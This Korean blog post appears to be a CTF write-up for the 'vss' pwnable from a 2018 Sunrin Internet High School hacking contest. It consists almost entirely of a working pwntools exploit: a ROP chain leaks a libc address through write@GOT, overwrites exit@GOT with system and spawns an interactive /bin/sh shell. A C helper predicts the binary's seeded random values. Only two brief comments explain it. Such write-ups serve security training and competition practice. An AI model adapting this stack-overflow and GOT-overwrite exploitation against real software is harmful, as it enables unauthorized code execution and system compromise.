hOwDayS 선린 10720
선린인터넷고등학교 교내해킹방어대회 2018 vss 본문
많이 돌려봐야 된다
주소가 0x00 에 배치되길 기다리며 RTJ 를 한다
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 | from pwn import * import time import sys pppr = 0x080486f9 #pppr = 0x8048693 pr = 0x08048361 main = 0x8048522 context.terminal = ['gnome-terminal','-x','sh','-c'] def GET_RANDOM(): print_random = process("./print_random") random_value = print_random.recv().replace(" ","").split("\n") try: del random_value[11] except: None try: del random_value[10] except: None print_random.close() return random_value while True: is_leaked = False for j in range(0,255): p = process("./vss") e = ELF("./vss") rand = GET_RANDOM() print rand print p.recv() payload= "\x90" * (288 -72) payload += p32(e.plt["write"]) payload += p32(pppr) payload += p32(1) payload += p32(e.got["write"]) payload += p32(0x100) payload += p32(e.plt["read"]) payload += p32(pppr) payload += p32(0) payload += p32(e.got["exit"]) payload += p32(8) payload += p32(e.plt["read"]) payload += p32(pppr) payload += p32(0) payload += p32(e.bss()+100) payload += p32(len("/bin/sh\x00")) # 0x15ba0b payload += p32(e.plt["exit"]) payload += "AAAA" payload += p32(e.bss()+100) payload += "\x90" * (320 - len(payload)) try: for i in rand: payload += p32(int(i)) except: p.close() continue payload += "A" * (0x1ac - len(payload) - 52) payload += p8(0)#p8(j) #raw_input() p.send(payload) try: leak = u32(p.recv(4)) print hexdump(leak) log.success("leak : " + hex(leak)) libc_base = leak - 0xd5b70 if hex(libc_base)[2:4] == "f7": is_leaked = True #gdb.attach(proc.pidof(p)[0]) log.success("libc_base : " + hex(libc_base)) log.success("system_addr : " + hex(libc_base + 0x3ada0)) p.send(p32(libc_base+0x3ada0)) p.send("/bin/sh\x00") p.interactive() break except : p.close() p.close() if is_leaked: break | cs |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | #include <stdio.h> #include <time.h> #include <stdlib.h> void main() { int v5[100]; unsigned int v1 = time(0); srand(v1); int v2 = 50 * rand() / 30; //0x2000 , 4120 int v3 = (0x2000 - 4120 + 0x2000 / 4120) * (0x2000 - 4120 + 0x2000 / 4120) * (0x2000 - 4120 + 0x2000 / 4120); srand(v2 - v3); for(int i=0; i<=9; ++i) { v5[i] = rand(); printf("%d \n",v5[i]); } printf("\n"); } | cs |
'CTF' 카테고리의 다른 글
| h3xor ctf my_house (1) | 2018.06.17 |
|---|---|
| h3xor ctf easy (0) | 2018.06.17 |
| 선린인터넷고등학교 교내해킹방어대회 2018 cee (0) | 2018.06.11 |
| 선린인터넷고등학교 교내해킹방어대회 2018 SHELLCODING (0) | 2018.06.07 |
| ASISCTF FCascasde (0) | 2018.05.05 |
Comments